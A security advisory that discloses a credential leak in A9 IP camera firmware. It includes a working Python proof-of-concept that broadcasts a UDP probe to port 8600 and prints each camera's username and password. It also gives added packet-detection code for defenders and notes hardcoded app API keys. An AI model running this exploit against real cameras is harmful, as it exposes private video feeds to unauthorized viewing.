Summary

An issue in CYCZCAM, SHIX ZHAO, SHIXCAM A9 Camera (circuit board identifier A9-48B-V1.0) firmware v.CYCAM_48B_BC01_v87_0903 allows a remote attacker to obtain sensitive information via a crafted request to a UDP port.

Vulnerability Details

By sending a UDP packet with the two-byte payload 0x2211 to port 8600 of the camera, an attacker receives the password needed to add the camera and thereby gains access to the camera’s video feed. To find out whether your “A9” camera is vulnerable, you can check:

  1. by running the PoC script on your LAN: all affected cameras will reply to you (image: Script Output)
  2. the internals of the camera (image: A9 Camera Circuit Board)
  3. the serial number (DDD-XXXXXX-XXXXX) shown when adding the camera in CY365/365cam (image: Adding the camera via developer’s app)
  4. the firmware version (CYCAM_48B_BC01_v87_0903) shown after you have added the camera (image: camera firmware)

Proof-of-Concept

#!/usr/bin/env python3

import socket
from netifaces import interfaces, ifaddresses, AF_INET

# alternatively if you know the camera's IP address
# you can replace it here
TARGET = '255.255.255.255'

# collect one usable IPv4 address per interface so the broadcast
# is sent on every LAN this host is attached to
ips = []
for iface in interfaces():
  addrs = ifaddresses(iface)
  if AF_INET in addrs: addrs = addrs[AF_INET]
  else: continue

  for addr in addrs:
    ip = addr['addr']
    # skip duplicates, unassigned, loopback and link-local addresses
    if ip in ips or ip == '0.0.0.0' or ip[0:3] == '127' or ip[0:7] == '169.254': continue
    ips.append(ip)

for ip in ips:
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
  s.settimeout(.5)
  s.bind((ip, 0))

  # the two-byte "LAN search" request 0x2211, sent to UDP port 8600
  lanSearch = b'\x22\x11'
  s.sendto(lanSearch, (TARGET, 8600))
  # every camera that answers sends its details in cleartext;
  # stop once no further reply arrives within the timeout
  while True:
    try:
      (buff, rinfo) = s.recvfrom(1024)
      #print('Data from %s: %s' % (rinfo, buff))
      print('IP: ' + buff[4:20].decode('ascii').rstrip('\0'))
      print('Device ID: ' + buff[92:110].decode('ascii').rstrip('\0'))
      print('Username: ' + buff[188:193].decode('ascii').rstrip('\0'))
      print('Password: ' + buff[193:].decode('ascii').rstrip('\0'))
    except socket.timeout:
      break
  s.close()
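As an added defender-side example (not part of the original advisory), the following classifies UDP datagrams as either the 0x2211 probe to port 8600 or a reply from port 8600 carrying cleartext credentials at the offsets the PoC above reads, so the exchange can be flagged from a packet capture or network sensor. The Datagram record, the sample reply and the sample traffic are constructed for illustration, not captured from a real camera.

```python
from dataclasses import dataclass
from typing import List, Optional

LAN_SEARCH_PORT = 8600          # UDP port from the advisory
LAN_SEARCH_MAGIC = b'\x22\x11'  # probe payload from the advisory
USER_OFF, PASS_OFF = 188, 193   # credential offsets the PoC reads from a reply

@dataclass
class Datagram:  # hypothetical record for one captured UDP datagram
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes

def _printable(b: bytes) -> bool:
    return len(b) > 0 and all(32 <= c < 127 for c in b)

def classify(d: Datagram) -> Optional[str]:
    """Label a datagram as the A9 probe, a credential-bearing reply, or None."""
    # probe: anything sent to UDP/8600 whose payload is exactly 0x2211
    if d.dport == LAN_SEARCH_PORT and d.payload == LAN_SEARCH_MAGIC:
        return f'A9_LAN_SEARCH_PROBE from {d.src}'
    # reply: from UDP/8600, long enough to hold the credential fields, with
    # printable ASCII where the PoC expects the username and password
    if d.sport == LAN_SEARCH_PORT and len(d.payload) > PASS_OFF:
        user = d.payload[USER_OFF:PASS_OFF].rstrip(b'\0')
        pw = d.payload[PASS_OFF:].rstrip(b'\0')
        if _printable(user) and _printable(pw):
            # report the account name only; never write the password to a log
            return f'A9_CREDENTIAL_LEAK from {d.src} (user={user.decode()})'
    return None

def scan(datagrams) -> List[str]:
    return [a for a in map(classify, datagrams) if a]

def build_sample_reply() -> bytes:
    """Constructed reply laid out as the PoC parses it (not a real capture)."""
    buf = bytearray(200)
    def put(off, val): buf[off:off + len(val)] = val
    put(4, b'10.0.0.20'); put(92, b'DDD-123456-12345')
    put(USER_OFF, b'admin'); put(PASS_OFF, b'secret')
    return bytes(buf)

SAMPLE_TRAFFIC = [  # constructed datagrams, not captured traffic
    Datagram('10.0.0.5', 5353, '10.0.0.1', 53, b'\x12\x34\x01\x00'),
    Datagram('10.0.0.9', 40000, '255.255.255.255', LAN_SEARCH_PORT, LAN_SEARCH_MAGIC),
    Datagram('10.0.0.20', LAN_SEARCH_PORT, '10.0.0.9', 40000, build_sample_reply()),
]
```

Feeding real captures through scan() only needs each UDP packet mapped onto the Datagram fields; the probe alert identifies the scanning host and the leak alert identifies every camera that answered it.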

Misc.

Multiple communication attempts to multiple email addresses possibly linked to the “vendor” were made in early 2024, with zero response.

Users of the Android app’s “cloud storage service” should also re-evaluate its risks, as the API keys hardcoded into the application can easily be accessed by anyone.